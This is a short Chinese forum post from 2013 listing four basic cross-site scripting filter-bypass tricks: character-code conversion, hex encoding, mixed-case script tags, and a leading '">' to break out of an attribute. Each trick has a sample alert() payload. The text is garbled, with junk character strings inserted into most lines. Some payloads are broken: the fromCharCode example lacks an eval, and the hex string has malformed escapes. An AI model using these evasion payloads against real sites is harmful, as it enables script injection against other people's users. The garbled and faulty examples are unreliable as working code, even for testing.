找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2038|回复: 0
打印 上一主题 下一主题

XSS 绕过技术

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-14 00:10:39 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
四种超级基础的绕过方法。8 j1 V8 I% ^- D7 Q( y0 d5 Q2 s
1.转换为ASCII码$ x9 u1 v2 C3 d0 ^
例子:原脚本为<script>alert(‘I love F4ck’)</script >
7 G, M. f, [7 J通过转换,变成:; k, z2 O, J: \5 V" J' ?8 S
<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>2 ~2 c/ ^; [4 u* Z
4 i2 S, y% z3 `8 ~: m* b
2.转换为HEX(十六进制)
7 B; |3 {  ^. ^7 d; s, x* X例子:原脚本为<script>alert(‘I love F4ck’)</script>+ U) f. p7 B2 p2 t6 G2 F
通过转换,变成:
4 K- S  `3 _! g2 X%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e
2 H6 e6 d) @( ?   X5 }8 e& }9 B! |1 H
3.转换脚本的大小写
' M# `; Q2 U( o: Q3 Q3 T例子:原脚本为<script>alert(‘I love F4ck’)</script>
- @8 h; S; q# y6 j转换为:<ScRipt>AleRt(‘I love F4ck’)</sCRipT>
7 d" Z  L4 k# h; p! |
* i* Q, A* C  @, k0 V' Z+ }4.增加闭合标记”>
$ j* A/ v9 k2 O" V7 D8 |例子:原脚本为<script>alert(‘I love F4ck’)</script>
9 a, ?! r' W' t/ N) Z; `转换为:”><script>alert(‘I love F4ck’)</script>; n5 ^" W* D) O, G
更详细绕过技术请参考此网页
4 u! ^7 u4 X) N% G1 Y' |( I5 d' W2 v' Ghttps://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet, ^" w5 W, o$ i) I
. r7 \+ H* p1 n
转换工具使用的是火狐的 hackbar mozilla addon.
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表